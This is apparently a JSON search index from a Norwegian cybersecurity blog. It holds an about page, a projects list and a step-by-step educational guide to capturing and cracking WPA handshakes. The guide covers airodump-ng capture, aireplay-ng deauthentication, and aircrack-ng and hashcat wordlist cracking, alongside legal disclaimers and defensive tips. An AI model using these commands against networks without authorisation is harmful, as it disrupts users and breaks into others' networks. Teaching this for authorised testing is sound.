Overvåking av nettverksmiljø er nødvendig Implementering av forsvarsdybde Denne informasjonen er kun for utdanningsformål og autorisert penetrasjonstesting. Misbruk av disse teknikkene er ulovlig og uetisk.\n","date":"2025-04-21","externalUrl":null,"permalink":"/no/posts/wpa2-enterprise/","section":"Posts","summary":"En steg-for-steg guide for å angripe WPA2 enterprise nettverk ved bruk av hostapd-mana og freeradius.","title":"Angrep på WPA2 Enterprise nettverk","type":"posts"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/tags/enterprise/","section":"Tags","summary":"","title":"Enterprise","type":"tags"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/tags/freeradius/","section":"Tags","summary":"","title":"Freeradius","type":"tags"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/tags/hostapd-mana/","section":"Tags","summary":"","title":"Hostapd-Mana","type":"tags"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/tags/oswp/","section":"Tags","summary":"","title":"Oswp","type":"tags"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/categories/tr%C3%A5dl%C3%B8se-nettverk/","section":"Categories","summary":"","title":"Trådløse Nettverk","type":"categories"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/categories/wireless-networking/","section":"Categories","summary":"","title":"Wireless Networking","type":"categories"},{"content":"","date":"2025-04-21","externalUrl":null,"permalink":"/no/tags/wpa2/","section":"Tags","summary":"","title":"WPA2","type":"tags"},{"content":"Hei, jeg er Aldar Ali, en IT-konsulent og junior penetrasjonstester. Jeg har en sterk lidenskap for cybersikkerhet og nettverk og liker å lære nye ting om teknologi. I mitt arbeid overvåker jeg systemer, håndterer alarmer og hjelper til med å løse IT-problemer. Jeg har også jobbet på prosjekter som bruker AI for å forbedre dokumenthåndtering og bygget webapplikasjoner som gjør prosesser enklere for brukere. Jeg liker å jobbe i team, ta på meg utfordringer og kontinuerlig forbedre ferdighetene mine. Når jeg ikke er opptatt med arbeid, utforsker jeg alltid det nyeste innen teknologi og cybersikkerhet.\n","date":"2025-04-01","externalUrl":null,"permalink":"/no/about/","section":"Aldar Ali - Systemingeniør og Cybersikkerhetsentusiast","summary":"Hei, jeg er Aldar Ali, en IT-konsulent og junior penetrasjonstester. Jeg har en sterk lidenskap for cybersikkerhet og nettverk og liker å lære nye ting om teknologi. I mitt arbeid overvåker jeg systemer, håndterer alarmer og hjelper til med å løse IT-problemer.","title":"Om meg","type":"page"},{"content":"","date":"2025-03-28","externalUrl":null,"permalink":"/no/tags/aircrack-ng/","section":"Tags","summary":"","title":"Aircrack-Ng","type":"tags"},{"content":"Før vi starter med Aircrack-ng, må vi fange en WPA 4-way handshake mellom tilgangspunktet (AP) og en ekte klient (PC, tablet, telefon, osv.). Denne handshaken inneholder den nødvendige informasjonen for å knekke passfrasen (passordet).\nSteg 1: Aktiver Monitor-modus og Identifiser Målet # For å begynne, aktiver monitor-modus på ditt trådløse grensesnitt (wlan0).\nEtter å ha satt vårt wlan0-grensesnitt i monitor-modus, har vi nå et grensesnitt som kalles wlan0mon. Vi identifiserer deretter kanalen til mål-AP-et og samler dens BSSID ved å bruke:\nsudo airodump-ng wlan0mon Steg 2: Fang WPA Handshake # For å fange handshaken, fokuserer vi på det spesifikke målet ved å bruke:\nsudo airodump-ng -c [KANAL] --bssid [BSSID] -w [FILNAVN] wlan0mon For eksempel:\nsudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon Dette kommandoen vil:\nOvervåke kanal 6 (-c 6) Fokusere på spesifikt BSSID (--bssid) Lagre data til filer som starter med \u0026ldquo;capture\u0026rdquo; (-w capture) Steg 3: Tvinge Handshake ved Deauthentication # Hvis ingen klienter for øyeblikket kobler til nettverket, kan vi tvinge en handshake ved å sende deauthentication-pakker til eksisterende klienter:\nsudo aireplay-ng --deauth [ANTALL] -a [AP_BSSID] -c [KLIENT_MAC] wlan0mon For eksempel:\nsudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon Dette vil:\nSende 10 deauth-pakker (--deauth 10) Til AP med BSSID AA:BB:CC:DD:EE:FF (-a) Rette mot klient med MAC 11:22:33:44:55:66 (-c) Steg 4: Verifiser Handshake Capture # Når en handshake er fanget, vil airodump-ng vise \u0026ldquo;WPA handshake\u0026rdquo; i øvre høyre hjørne av terminalen.\nDu kan også verifisere handshaken ved å bruke:\naircrack-ng capture-01.cap Steg 5: Knebbe WPA Passfrasen # Ordbok-angrep # Den vanligste metoden er å bruke en ordbok (wordlist):\naircrack-ng -w [WORDLIST] [CAPTURE_FILE] For eksempel:\naircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap Brute Force-angrep # For mer omfattende angrep kan du generere egendefinerte wordlists:\n# Generere numerisk wordlist crunch 8 12 0123456789 -o numbers.txt # Bruke med aircrack-ng aircrack-ng -w numbers.txt capture-01.cap Steg 6: Hashcat for Raskere Knekking # For bedre ytelse, konverter .cap filen til hashcat-format:\n# Konverter til hashcat-format hcxpcapngtool -o hash.hc22000 capture-01.cap # Bruk hashcat hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt Viktige Sikkerhetsnotater # Lovlige Hensyn # Kun test på dine egne nettverk Få eksplisitt tillatelse før testing Følg lokale lover og forskrifter Etiske Retningslinjer # Bruk kunnskapen ansvarlig Ikke utfør uautoriserte angrep Respekter andres personvern Forsvarsstrategier # For Nettverksadministratorer: # Bruk sterke passfraser (minst 12 tegn) Implementer WPA3 når mulig Overvåk for deauth-angrep Bruk enterprise-autentisering For Hjemmebrukere: # Bruk komplekse passord Endre standard router-passord Oppdater firmware regelmessig Deaktiver WPS hvis ikke nødvendig Feilsøking # Vanlige Problemer: # Monitor-modus fungerer ikke:\nsudo airmon-ng check kill sudo airmon-ng start wlan0 Ingen handshake fanget:\nSørg for at klienter er tilkoblet Prøv forskjellige deauth-mål Verifiser korrekt kanal og BSSID Knekking tar for lang tid:\nBruk kraftigere wordlists Vurder hashcat med GPU-akselerasjon Test mot svakere mål først Konklusjon # WPA handshake-fangst er en fundamental ferdighet innen trådløs sikkerhetstesting. Mens verktøyene er kraftige, må de brukes ansvarlig og etisk.\nViktige Lærdommer: # Monitor-modus er essensielt for pakke-fangst Deauth-angrep kan tvinge handshakes Ordbok-kvalitet påvirker suksessrate GPU-akselerasjon forbedrer ytelsen betydelig Denne guiden er kun for utdannings- og autoriserte testformål. Misbruk av disse teknikkene er ulovlig.\n","date":"2025-03-28","externalUrl":null,"permalink":"/no/posts/aircrack-ng-capturing-wpa-handshakes/","section":"Posts","summary":"En steg-for-steg guide for å fange WPA handshakes ved hjelp av Aircrack-ng, aktivere monitor-modus og knekke passfrasen.","title":"Aircrack-ng - Fange WPA Handshakes","type":"posts"},{"content":"","date":"2025-03-28","externalUrl":null,"permalink":"/no/tags/tr%C3%A5dl%C3%B8se-nettverk/","section":"Tags","summary":"","title":"Trådløse Nettverk","type":"tags"},{"content":"","date":"2025-03-28","externalUrl":null,"permalink":"/tags/wireless-networking/","section":"Tags","summary":"","title":"Wireless Networking","type":"tags"},{"content":"","date":"2025-03-28","externalUrl":null,"permalink":"/no/tags/wpa/","section":"Tags","summary":"","title":"WPA","type":"tags"},{"content":"","date":"2025-01-23","externalUrl":null,"permalink":"/no/categories/blogg/","section":"Categories","summary":"","title":"Blogg","type":"categories"},{"content":"","date":"2025-01-23","externalUrl":null,"permalink":"/no/tags/introduksjon/","section":"Tags","summary":"","title":"Introduksjon","type":"tags"},{"content":"","date":"2025-01-23","externalUrl":null,"permalink":"/no/tags/norsk/","section":"Tags","summary":"","title":"Norsk","type":"tags"},{"content":"","date":"2025-01-23","externalUrl":null,"permalink":"/no/tags/velkommen/","section":"Tags","summary":"","title":"Velkommen","type":"tags"},{"content":" Velkommen! # Hei og velkommen til den norske versjonen av nettsiden min!\nDette er en introduksjon til den norske delen av bloggen min. Her vil jeg dele tanker og artikler på norsk om:\nCybersikkerhet - De nyeste trendene og truslene innen informasjonssikkerhet Penetrasjonstesting - Praktiske tips og teknikker IT-konsulentvirksomhet - Erfaringer fra feltet Teknologi - Interessante utviklinger og verktøy Hva kan du forvente? # Jeg planlegger å publisere regelmessige innlegg om cybersikkerhet, tekniske gjennomganger av CTF-maskiner, og generelle refleksjoner rundt IT-bransjen.\nNettsiden støtter nå både engelsk og norsk, så du kan enkelt bytte mellom språkene ved hjelp av språkmenyen.\nTakk for at du besøker siden min!\nFor English content, please use the language switcher or visit the English version.\n","date":"2025-01-23","externalUrl":null,"permalink":"/no/posts/velkommen/","section":"Posts","summary":"Velkommen til den norske delen av bloggen min!","title":"Velkommen til den norske versjonen av min nettside","type":"posts"},{"content":"Jeg setter alltid av tid til både arbeid og selvutvikling. Selv om mange av disse lidenskapsprosjektene aldri blir fullstendig realisert, gir de uvurderlige muligheter til å eksperimentere i virkelige scenarier og lære praktiske ferdigheter.\nLogo Tittel Beskrivelse Referanser netscanX Fullført Et nettverksskannings- og sikkerhetsanalyseverktøy for Linux-miljøer. github Chatbot Fullført AI-drevet chatbot trent på innhold fra ThinkMind-biblioteket, med målet om å gi brukere relevante artikler og konferanser på en effektiv måte. Prosjektet ble implementert i Python, ved hjelp av Langchain-rammeverket for å integrere LLM-modeller og vektordatabaser. github ","date":"2022-06-13","externalUrl":null,"permalink":"/no/projects/","section":"Aldar Ali - Systemingeniør og Cybersikkerhetsentusiast","summary":"Jeg setter alltid av tid til både arbeid og selvutvikling. Selv om mange av disse lidenskapsprosjektene aldri blir fullstendig realisert, gir de uvurderlige muligheter til å eksperimentere i virkelige scenarier og lære praktiske ferdigheter.","title":"Prosjekter","type":"page"}]